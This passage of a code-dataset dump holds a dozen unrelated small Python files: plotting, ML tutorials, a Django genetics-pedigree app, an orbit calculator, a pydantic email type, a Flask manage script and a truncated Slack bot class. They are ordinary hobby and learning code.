\"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\nvisits_per_month = [9695, 7909, 10831, 
12942, 12495, 16794, 14161, 12762, 12777, 12439, 10309, 8724]\n\n# numbers of limes of different species sold each month\nkey_limes_per_month = [92.0, 109.0, 124.0, 70.0, 101.0, 79.0, 106.0, 101.0, 103.0, 90.0, 102.0, 106.0]\npersian_limes_per_month = [67.0, 51.0, 57.0, 54.0, 83.0, 90.0, 52.0, 63.0, 51.0, 44.0, 64.0, 78.0]\nblood_limes_per_month = [75.0, 75.0, 76.0, 71.0, 74.0, 77.0, 69.0, 80.0, 63.0, 69.0, 73.0, 82.0]\n\n\n# create your figure here\nplt.figure(figsize=(12, 8))\nax1 = plt.subplot(1, 2, 1)\nx_values = range(len(months))\nplt.plot(x_values, visits_per_month, marker='o')\nplt.xlabel('Months')\nplt.ylabel('Number of visits')\nax1.set_xticks(x_values)\nax1.set_xticklabels(months)\nplt.title('Page visits per month')\n\nax2 = plt.subplot(1, 2, 2)\nplt.plot(x_values, key_limes_per_month, marker='*', color='blue')\nplt.plot(x_values, persian_limes_per_month, marker='*', color='pink')\nplt.plot(x_values, blood_limes_per_month, marker='*', color='green')\nlegend_limes = ['Key Limes', 'Persian Limes', 'Blood Limes']\nplt.legend(legend_limes, loc=8)\nplt.xlabel('Months')\nplt.ylabel('Number of limes sold')\nax2.set_xticks(x_values)\nax2.set_xticklabels(months)\nplt.title('Lime sales per month')\n\nplt.show()\n","repo_name":"Bharadwaja92/DataScienceProjects","sub_path":"Visualization/Matplotlib/SublimeLimes/LimePlots.py","file_name":"LimePlots.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27672298469","text":"import pandas\nfrom sklearn import linear_model\n\ndf = pandas.read_csv(\"housepricedata.csv\")\n\nY = df[[\"SalePrice\"]]\nY = Y.head(100)\n\nX = df[[\"LotArea\", \"OverallCond\", \"YearBuilt\"]]\nX = X.head(100)\n\nreg = linear_model.LinearRegression()\nreg.fit(X, Y)\n\nprint(reg.predict([[8450, 7, 2002]]))\n\n\n\n\n\n","repo_name":"wheatgreaser/House-Price-Predictinator","sub_path":"housepricepredictinator.py","file_name":"housepricepredictinator.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33161544819","text":"#!/usr/bin/python3\n\"\"\"lists states and cities from the database using orm\"\"\"\n\nfrom sys import argv\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\nfrom relationship_state import Base, State\nfrom relationship_city import City\n\nif __name__ == \"__main__\":\n    \"\"\"lists states from the database using orm\"\"\"\n    uri = 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n        argv[1], argv[2], argv[3])\n    engine = create_engine(uri, pool_pre_ping=True)\n\n    Base.metadata.create_all(engine)\n    Sesh = sessionmaker(bind=engine)\n    sesh = Sesh()\n    data = sesh.query(State).order_by(State.id).all()\n    for item in data:\n        print(\"{}: {}\".format(item.id, item.name))\n        for elem in item.cities:\n            print(\"{}{}: {}\".format(\" \"*4, elem.id, elem.name))\n\n    sesh.close()\n","repo_name":"Raytchellee/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/101-relationship_states_cities_list.py","file_name":"101-relationship_states_cities_list.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30723280326","text":"def find_letter(A, B):\n    for A_index, A_char in enumerate(A):\n        for B_index, B_char in enumerate(B):\n            if A_char == B_char:\n                return A_index, B_index\n\ndef main():\n    A, B = input().split()\n\n    A_index, 
B_index = find_letter(A, B)\n\n for i in range(len(B)):\n if i == B_index:\n print(A)\n else:\n print('.' * A_index + B[i] + '.' * (len(A) - A_index - 1))\n \nmain()\n","repo_name":"BenRStutzman/kattis","sub_path":"Open Kattis/krizaljka.py","file_name":"krizaljka.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71321783616","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfashion_mnist = keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\nplt.figure(figsize=(10, 10))\nfor i in range(25):\n plt.subplot(5, 5, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\nplt.show()\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, epochs=5)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('Test accuracy: ', test_acc)\n\npredictions = model.predict(test_images)\nprint(predictions[0])\n\n# Most confident that the image is in the printed category\nprint(np.argmax(predictions[0]))\n\n# The actual category of the image\nprint(test_labels[0])\n\n\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100 * np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('green')\n\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows * num_cols\nplt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)\n plot_image(i, predictions, test_labels, test_images)\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)\n plot_value_array(i, predictions, test_labels)\nplt.show()\n\nimg = test_images[0]\nimg = (np.expand_dims(img, 0))\npredictions_single = model.predict(img)\nplot_value_array(0, predictions, test_labels)\n_ = plt.xticks(range(10), class_names, rotation = 45)\n\ndef print_hi(name):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n\n# See 
PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"LukeEff/TensorflowImageRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23241233541","text":"def js(n):\n lst = []\n for i in range(1, n + 1):\n if i % 2 != 0:\n lst.append(i)\n return lst\n\n\na = int(input())\nt = 1\nsum = 0\nfor k in js(a):\n t = 1\n for j in range(1, k + 1):\n t = t * j\n sum = sum + t\nprint(f\"sum={sum}\")\n","repo_name":"Yanoisame/PTA-HomeWorks","sub_path":"py/循环题型/7-95 计算奇数阶乘之和.py","file_name":"7-95 计算奇数阶乘之和.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3879132709","text":"# Databricks notebook source\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\nrace_year_list = race_year_list_func(presentation_folder_path,\"race_results\",v_file_date)\n\n# COMMAND ----------\n\ndf = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\ndf1 = sum_points_and_group_by_func(df,[\"race_year\",\"team\"])\n\n# COMMAND ----------\n\nfinal_df = rank_by_year_func(df1)\n\n# COMMAND ----------\n\noverwrite_partition_write_table(final_df,'f1_presentation','constructor_standings','race_year',['race_year','team'])\n\n# COMMAND ----------\n\n\n","repo_name":"ryaneaston0517/formula1_databricks_demo","sub_path":"presentation/3 - constructor_standings.py","file_name":"3 - constructor_standings.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16617977409","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# Notice that by pinyin I mean spellings for Cantonese.\n\n# Input: list with char + pinyin\n# Output: list of unique pinyins\n\nimport sys\n\nf1 = open(\"web/exact-Google-pinyins.txt\", \"r\")\t\t\t# format: \"字pinyin\" or \"字字pinyin pinyin\"\n\n# Output Format:\n# consonant\n# nucleus\n\nconsonants = [ 'b','p','m','f','d','t','n','l','g','k','h','j','q','w','x','y','r' ]\n# 'zh','ch','sh','z','c','s' are treated as special cases\n\nvowels = ['a', 'e', 'i', 'o', 'u']\t\t# 'y' may be special case?\n\nks = set()\nns = set()\n\n# ***** convert to consonant-nucleus form *****\ndef k_n(pinyin_):\n\t# test for special cases: z,c,s,zh,ch,sh\n\tc = pinyin_[0]\n\tconsonant = \"\"\n\tnucleus = \"\"\n\tif c in vowels:\t\t\t\t\t\t\t# consonant doesn't exist\n\t\tnucleus = pinyin_\n\t\treturn [consonant, nucleus]\n\n\tconsonant = c\n\tif len(pinyin_) == 1:\t\t\t\t\t# only 1 pinyin letter, eg 'm'\n\t\treturn [consonant, \"\"]\n\n\tc = pinyin_[1]\n\tif c in vowels:\t\t\t\t\t\t\t# 1 consonant followed by vowel(s)\n\t\tnucleus = pinyin_[1:]\n\t\treturn [consonant, nucleus]\n\n\tconsonant += c\n\tif len(pinyin_) == 2:\t\t\t\t\t# only 2 pinyin letters, eg 'ng'\n\t\treturn [consonant, \"\"]\n\t\n\tc = pinyin_[2]\n\tif not c in vowels and c != 'y':\t\t# 'y' is special vowel\n\t\tprint(\"abnormal: >2 consonants\")\n\t\tprint(line)\n\t\treturn [\"\", \"\"]\n\telse:\n\t\tnucleus = pinyin_[2:]\n\t\treturn [consonant, nucleus]\n\nfor line in f1:\n\tif 
ord(line[1]) > 127:\t\t\t\t# ignore phrases for now\n\t\tcontinue\n\n\tpinyin = line[1:-1]\t\t\t\t\t\t# last char is '\\n'\n\t# print (pinyin)\n\n\t[k, n] = k_n(pinyin)\n\tks.add(k)\n\tns.add(n)\n\nfo = sys.stdout\n# fo = open(\"Google-unique-pinyins.txt\", \"w\")\n\nfo.write('// consonants:\\n')\n\nfor k in ks:\n\tfo.write(k + '\\n')\n\nfo.write('// vowels:\\n')\n\nfor n in ns:\n\tfo.write(n + '\\n')\n\nfo.close()\n","repo_name":"Cybernetic1/conceptual-keyboard-v1_bad","sub_path":"find-unique-pinyins.py","file_name":"find-unique-pinyins.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"79"} +{"seq_id":"25967537943","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns =[\r\n path('', views.index, name='index'),\r\n path('personnel', views.personnel, name='personnel'),\r\n path('projects/complete', views.c_projects, name='c-projects'),\r\n path('projects/pending', views.p_projects, name='p-projects'),\r\n path('products', views.products, name='products')\r\n]\r\n\r\n","repo_name":"earlestradalopez/javeryconstruction","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28767851989","text":"import pytest\nfrom main import (\n read_puzzle_input,\n calc_n_paths,\n calc_n_paths_revisited,\n)\n\n\n@pytest.mark.parametrize(\n \"test_input, n_paths\",\n [\n (\"small_test_input.txt\", 10),\n (\"medium_test_input.txt\", 19),\n (\"large_test_input.txt\", 226),\n ],\n)\ndef test_calc_n_paths_with_test_inputs(test_input, n_paths):\n puzzle_input = read_puzzle_input(test_input)\n assert n_paths == calc_n_paths(puzzle_input)\n\n\n@pytest.mark.parametrize(\n \"test_input, n_paths\",\n [\n (\"small_test_input.txt\", 36),\n (\"medium_test_input.txt\", 103),\n (\"large_test_input.txt\", 3509),\n ],\n)\ndef test_calc_n_paths_revisited_with_test_inputs(test_input, n_paths):\n puzzle_input = read_puzzle_input(test_input)\n assert n_paths == calc_n_paths_revisited(puzzle_input)\n","repo_name":"DerPhysikeR/advent_of_code_2021","sub_path":"12/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7392859221","text":"from django.shortcuts import render\nfrom GeneTest.nucleus import *\nfrom GeneTest import pedigree\nfrom GeneTest.models import *\nfrom django.shortcuts import render\nfrom home.forms import UserForm,UserProfileInfoForm\nfrom django.contrib.auth.models import User\nfrom home.models import UserProfileInfo\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nglobal generations\ngenerations={}\n\n\n@login_required\ndef index(request):\n if request.user.is_authenticated:\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n user_traits=have.objects.filter(user_id=user)\n if len(user_traits)>0:\n results=tests.objects.filter(user_id1=user)\n results=results.union(tests.objects.filter(user_id2=user))\n print(results)\n #here's going to be some history, previous tests\n return render(request,'GeneTest/index.html',{'results':results})\n else:\n traits=trait.objects.all()\n genes={}\n for i in traits:\n 
genes[i]=gene.objects.filter(trait_name=i)\n print(genes)\n return render(request,'GeneTest/gene_registration.html',{'genes':genes})\n@login_required\ndef TraitDeseaseTest(request,user1=None,user2=None):\n test_types={'Trait test':'trait','Desease test':'desease','Alltogether':'all'}\n if request.method=='POST':\n user1=User.objects.get(username=request.user.username)\n user1=UserProfileInfo.objects.get(user=user1)\n user2=User.objects.get(username=request.POST.get('User2',False))\n user2=UserProfileInfo.objects.get(user=user2)\n test_name=test_types[request.POST.get('test_type',False)]\n context=run(user1,user2,test_name)\n if user1.sex==user2.sex:\n return HttpResponse('Gays can\\'t have children, sorry!')\n else:\n print(context)\n TEST={}\n TEST['test']=context['test']\n TEST['figure']=context['figure']\n TEST['result']=context['result']\n TEST['recombination']=recombination.objects.filter(test_id=context['test'])\n return render(request,'GeneTest/results.html',TEST)\n else:\n return HttpResponse('???')\n\n@login_required\ndef SelfTest(request):\n if request.method=='POST':\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n mom=request.POST.get('mom')\n dad=request.POST.get('dad')\n user1=User.objects.get(username=mom)\n user1=UserProfileInfo.objects.get(user=user1)\n user2=User.objects.get(username=dad)\n user2=UserProfileInfo.objects.get(user=user2)\n test_name='trait'\n context=run(user1,user2,test_name)\n if user1.sex==user2.sex:\n return HttpResponse('Gays can\\'t have children, sorry!')\n else:\n print(context)\n TEST={}\n TEST['test']=context['test']\n TEST['figure']=context['figure']\n TEST['result']=context['result']\n TEST['recombination']=recombination.objects.filter(test_id=context['test'])\n #t=tests.objects.get(test_id=TEST['test'].test_id)\n TEST['test'].accessor=user\n TEST['test'].save()\n return HttpResponseRedirect('/account/profile/')\n else:\n return HttpResponse('???')\n\n@login_required\ndef result(request,test_id):\n if request.method=='GET':\n TEST={}\n TEST['test']=tests.objects.get(test_id=test_id)\n TEST['figure']=figure.objects.get(test_id=TEST['test'])\n TEST['result']=figure.objects.get(test_id=TEST['test'])\n TEST['recombination']=recombination.objects.filter(test_id=TEST['test'])\n print(TEST)\n return render(request,'GeneTest/results.html',TEST)\n@login_required\ndef delete(request,test_id):\n if request.method=='GET':\n t=tests.objects.get(test_id=test_id)\n t.delete()\n return render(request,'account/index.html',{})\n@login_required\ndef gene_registration(request):\n if request.user.is_authenticated:\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n if request.method=='POST':\n for i in request.POST:\n if i!='csrfmiddlewaretoken' and i!='blank':\n try:\n h=have.objects.create(user_id=user, gene_name=gene.objects.get(NCIB_ID=request.POST.get(i)))\n h.save()\n except:\n pass\n return render(request,'GeneTest/index.html',{})\n\n\n#----------------------PEDIGREE PART -----------------------------------------------\n\n\n\ndef get_child(object):\n if object.sex:\n ch=type(object).objects.filter(dad=object)\n else:\n ch=type(object).objects.filter(mom=object)\n if len(ch)>0:\n return ch\n else:\n return None\n\ndef get_other_parent(object):\n GT=get_child(object)\n if GT is not None:\n if object.sex:\n return GT[0].mom\n else:\n return GT[0].dad\n else:\n return None\n\ndef FindFirstGeneration(UserObject):\n if (UserObject.mom is not None) and 
(UserObject.dad is not None):\n return FindFirstGeneration(UserObject=UserObject.mom),FindFirstGeneration(UserObject=UserObject.dad)\n elif (UserObject.mom is None) and (UserObject.dad is not None):\n return FindFirstGeneration(UserObject=UserObject.dad)\n elif (UserObject.mom is not None) and (UserObject.dad is None):\n return FindFirstGeneration(UserObject=UserObject.mom)\n else:\n return OrderAllGenerations(0,UserObject)\n\ndef OrderAllGenerations(index,UserObject):\n global generations\n child=get_child(UserObject)\n if child is not None:\n if index in generations.keys():\n if child[0] not in generations[index]:\n generations[index].append(child[0])\n else:\n generations[index]=[child[0]]\n for i in child:\n return OrderAllGenerations(index+1,i)\n else:\n generations[10000]=[UserObject]\n return generations\n\ndef QueryToParentObject(QueryObject, CarriedGene,list):\n return pedigree.Parent(doesHave=pedigree.DoesMemberHave(list,QueryObject.user.username),desease=CarriedGene,sex=QueryObject.sex,ID=QueryObject.user.username)\n\n@login_required\ndef DrawPedigree(request,gene_id=None,username=None):\n global generations\n generations={}\n subfamily={}\n user=User.objects.get(username=request.user.username)\n user=UserProfileInfo.objects.get(user=user)\n context=FindFirstGeneration(user)\n while isinstance(context,dict) is False:\n context=list(context).pop()\n traits=trait.objects.filter(type='desease')\n genes=[]\n for i in traits:\n genes.append(gene.objects.get(trait_name=i))\n if (username is not None) and (gene_id is not None):\n generations={}\n subfamily2={}\n user2=User.objects.get(username=username)\n user2=UserProfileInfo.objects.get(user=user2)\n context2=FindFirstGeneration(user2)\n while isinstance(context2,dict) is False:\n context2=list(context2).pop()\n desease=gene.objects.get(NCIB_ID=gene_id)\n DeseaseCarrier=have.objects.filter(gene_name=desease)\n\n GeneOfDesease=pedigree.Gene(inheritance=desease.trait_name.inheritance,name=desease.NCIB_ID,is_X_linked=desease.IsXLinked)\n DoesHaveList=[i.user_id.user.username for i in DeseaseCarrier]\n FamilyMembers={'user1':[],'user2':[]}\n user1=context\n user2=context2\n #user1.pop(10000)\n #user2.pop(10000)\n USERS={'user1':user1, 'user2':user2}\n for user in USERS.keys():\n FamilyMembers[user]=[]\n for i in USERS[user].keys():\n for j in USERS[user][i]:\n if len(FamilyMembers[user])==0:\n u=QueryToParentObject(j,GeneOfDesease,DoesHaveList)\n u.add_dad(QueryToParentObject(j.dad,GeneOfDesease,DoesHaveList))\n u.add_mom(QueryToParentObject(j.mom,GeneOfDesease,DoesHaveList))\n FamilyMembers[user].append(u)\n else:\n u=QueryToParentObject(j,GeneOfDesease,DoesHaveList)\n for i in FamilyMembers[user]:\n if i.ID == j.dad.user.username:\n u.add_dad(i)\n if i.ID == j.mom.user.username:\n u.add_mom(i)\n if u.mom is None:\n u.add_mom(QueryToParentObject(j.mom,GeneOfDesease,DoesHaveList))\n if u.dad is None:\n u.add_dad(QueryToParentObject(j.dad,GeneOfDesease,DoesHaveList))\n FamilyMembers[user].append(u)\n user1=FamilyMembers['user1'].pop()\n user2=FamilyMembers['user2'].pop()\n user1.set_genotype()\n user2.set_genotype()\n for u in [user1,user2]:\n print(u.desease.inheritance, '\\t' ,u.desease.genotype)\n if u.desease.inheritance=='recessive':\n if (u.desease.genotype == 0) and (u.ID not in DeseaseCarrier):\n us=User.objects.get(username=u.ID)\n g=gene.objects.get(NCIB_ID=u.desease.name)\n g.IsGenotypeSet=True\n g.save()\n have.objects.create(user_id=UserProfileInfo.objects.get(user=user2),gene_name=g)\n #change genotypes in the database\n 
else:\n if (u.ID not in DeseaseCarrier) and (u.desease.genotype==1):\n us=User.objects.get(username=u.ID)\n g=gene.objects.get(NCIB_ID=u.desease.name)\n g.IsGenotypeSet=True\n g.save()\n have.objects.create(user_id=UserProfileInfo.objects.get(user=us),gene_name=g)\n DeseaseCarrier=have.objects.filter(gene_name=desease)\n return render(request,'GeneTest/pedigree.html',{'UserFamily':context, 'PartnerFamily':context2,'genes':genes, 'carrier':DeseaseCarrier,'UserGenotypes':[user1,user2]})\n else:\n return render(request,'GeneTest/pedigree.html',{'UserFamily':context, 'genes':genes})\n","repo_name":"KristofGabor/MixYourGenes","sub_path":"pythonenv/MixYourGenes/GeneTest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31608790667","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 7 11:13:05 2019\r\n\r\n@author: lyh\r\n\r\n **Calculating orbit parameters**\r\n\r\n :alt0: Initial orbit height [km]\r\n :inc: Inclination [deg]\r\n :e: Eccentricity\r\n :re_cycle_num: Repeat cycle number [number/cycle]\r\n :alt: Final orbit height [km]\r\n :v: Satellite velocity [km/s]\r\n :dis: Sampling distance at equator [km]\r\n\r\n \"\"\"\r\n\r\nimport numpy as np\r\nfrom constants import constants as const\r\n\r\n\r\ndef orbit_com(alt0, inc, e, re_cycle_num, re_day, con_repeat=False):\r\n \r\n threshold = 10\r\n max_in = 100\r\n i = 0\r\n if con_repeat:\r\n while i\"\nAWS_SECRET=\"\"\nAWS_REGION=\"\"\n\ns3 = boto3.client('s3', aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n\ns3.create_bucket(Bucket='')","repo_name":"sigier/aws-infra","sub_path":"S3_create_bucket.py","file_name":"S3_create_bucket.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71854028096","text":"from typing import Any, Type\n\nfrom pydantic import GetJsonSchemaHandler\nfrom pydantic.json_schema import JsonSchemaValue\nfrom pydantic_core import core_schema\n\nEMAIL_PATTERN = r\"^[^@ \\t\\r\\n]+@[^@ \\t\\r\\n]+\\.[^@ \\t\\r\\n]+$\"\n\n\nclass Email(str):\n \"\"\"Email address of a person, organization or other entity.\"\"\"\n\n @classmethod\n def __get_pydantic_core_schema__(cls, _source: Type[Any]) -> core_schema.CoreSchema:\n \"\"\"Get pydantic core schema.\"\"\"\n return core_schema.str_schema(pattern=EMAIL_PATTERN)\n\n @classmethod\n def __get_pydantic_json_schema__(\n cls, core_schema_: core_schema.CoreSchema, handler: GetJsonSchemaHandler\n ) -> JsonSchemaValue:\n \"\"\"Add title and format.\"\"\"\n field_schema = handler(core_schema_)\n field_schema[\"title\"] = cls.__name__\n field_schema[\"format\"] = \"email\"\n field_schema[\"examples\"] = [\"info@rki.de\"]\n return field_schema\n","repo_name":"robert-koch-institut/mex-common","sub_path":"mex/common/types/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"41347427335","text":"import os\n\nimport click\n\nfrom app import create_app\n\n\n@click.group()\ndef main():\n pass\n\n\n@click.command()\ndef docs():\n \"\"\"\n 需要安装apidoc, `npm install apidoc -g`\n \"\"\"\n os.system(\"apidoc -i app/ -o docs/\")\n\n\n@click.command()\ndef run():\n \"\"\"\n 运行开发服务器\n \"\"\"\n app = create_app()\n app.run(host=\"0.0.0.0\", port=5001)\n\n\n@click.command()\n@click.option(\n \"--action\",\n 
prompt=\"\"\"请选择下一步操作:\n1. 生成 .pot 模板文件\n2. 为某个语言生成 .po 文件\n3. 重新生成 .pot 模板文件并更新 .po 文件\n4. 生产 .mo 文件\n\"\"\",\n type=int,\n)\ndef local(action):\n cfg_path = \"babel.cfg\"\n locale_folder = \"app/locales\"\n pot_filename = \"messages.pot\"\n pot_path = os.path.join(locale_folder, pot_filename)\n if not os.path.isdir(locale_folder):\n os.makedirs(locale_folder)\n if action == 1:\n os.system(\n \"pybabel extract -F {cfg_path} -k lazy_gettext -o {pot_path} .\".format( # noqa: E501\n cfg_path=cfg_path, pot_path=pot_path\n )\n )\n elif action == 2:\n if not os.path.isfile(pot_path):\n pass\n lang_name = click.prompt(\"Please enter a language name\")\n os.system(\n \"pybabel init -i {pot_path} -d {locale_folder} -l {lang_name}\".format( # noqa: E501\n pot_path=pot_path,\n locale_folder=locale_folder,\n lang_name=lang_name,\n )\n )\n elif action == 3:\n os.system(\n \"pybabel extract -F {cfg_path} -k lazy_gettext -o {pot_path} .\".format( # noqa: E501\n cfg_path=cfg_path, pot_path=pot_path\n )\n )\n os.system(\n \"pybabel update -i {pot_path} -d {locale_folder}\".format(\n pot_path=pot_path, locale_folder=locale_folder\n )\n )\n elif action == 4:\n os.system(\n \"pybabel compile -d {locale_folder}\".format(locale_folder=locale_folder)\n )\n\n\nmain.add_command(run)\nmain.add_command(local)\nmain.add_command(docs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kozzzx/moeflow-backend","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"19932907449","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n-----------------------------------------\n * * * Angeles Motors Inc. * * *\n-----------------------------------------\n\nCreated on Tue Jun 9 10:41:55 2020\n\n@author: bianhungchen\n\nSource:\n \nFunction:\n \n\"\"\"\n\n\n\nimport unittest\nimport test_usb\n\nclass testingusb(unittest.TestCase):\n \n # def setUpClass(self):\n # self.usb_info = test_usb.get_usb_info() # for example\n\n \n def test_info(self):\n usb_info = test_usb.get_usb_info() # for example\n \n self.assertEqual(test_usb.get_usb_info(), usb_info )\n\n # def tearDownClass(self):\n # print('done')\n\n\nif __name__ == '__main__':\n unittest.main()\n \n\n\n \n\n\n \n\n\n \n\n\n","repo_name":"hugochen121/test","sub_path":"unittest_TestCase_USB.py","file_name":"unittest_TestCase_USB.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26509328077","text":"import logging\nimport random\n\nimport requests\nfrom slackclient import SlackClient\n\n\nclass Communicator:\n \"\"\"Class handling communication to Slack, and with Radio REST API.\"\"\"\n channel_mention = \"\"\n current_shows_uri = \"/v2/sendinger/currentshows\"\n\n def __init__(self, slack_client: SlackClient, settings):\n self.slack_client = slack_client\n self.settings = settings\n self.first_message_ts = None\n self.username = None\n self.userid = None\n\n def send(self, message_type, num_minutes=None, reply_to=None, **kwargs):\n \"\"\"Send the given message type to Slack.\n\n Args:\n message_type: The key of self.settings.messages to use to look up\n message texts, from which one is picked at random.\n num_minutes: If provided, the value of\n self.settings.messages[message_type] is assumed to be a dict.\n All items in that dict which have a key less than or equal to\n num_minutes are chosen, or all messages from 
the highest key\n which matches that criteria if\n settings.messages['warnings_cumulative'] is False.\n reply_to: If provided, the message sent will be a reply to the\n given message. This should be the dictionary received from the\n Slack message event.\n kwargs: The text string will have {key} replaced with value for\n each key=value given to this method.\n \"\"\"\n possible_unformatted_message = self.settings.messages[message_type]\n\n if num_minutes is not None:\n matching_messages = []\n max_from_minute = 0\n for from_minute, messages in possible_unformatted_message.items():\n if from_minute <= num_minutes:\n if self.settings.messages['warnings_cumulative']:\n matching_messages.extend(messages)\n elif from_minute >= max_from_minute:\n matching_messages = messages\n max_from_minute = from_minute\n\n possible_unformatted_message = matching_messages\n\n unformatted_message = random.choice(possible_unformatted_message)\n\n formatted_message = unformatted_message.format(\n channel=self.channel_mention,\n **kwargs\n )\n self.send_custom(formatted_message, reply_to)\n\n def send_custom(self, message, reply_to=None):\n \"\"\"Send the given message to Slack.\n\n Args:\n message: The text to post on Slack.\n reply_to: If provided, the message will be sent as a reply to the\n message whose information is provided in this argument. Its\n format is equal to the dictionary received in message events\n from Slack.\n \"\"\"\n other_message_args = {\n 'channel': self.settings.channel,\n }\n\n if reply_to:\n if 'thread_ts' in reply_to:\n thread_ts = reply_to['thread_ts']\n else:\n thread_ts = reply_to['ts']\n other_message_args['thread_ts'] = thread_ts\n other_message_args['channel'] = reply_to['channel']\n\n data = self.slack_client.api_call(\n \"chat.postMessage\",\n text=message,\n as_user=True,\n **other_message_args\n )\n assert data['ok'], data\n if not self.first_message_ts:\n self.first_message_ts = data['ts']\n\n def thumb_up_msg(self, received_message):\n \"\"\"React with :+1: to 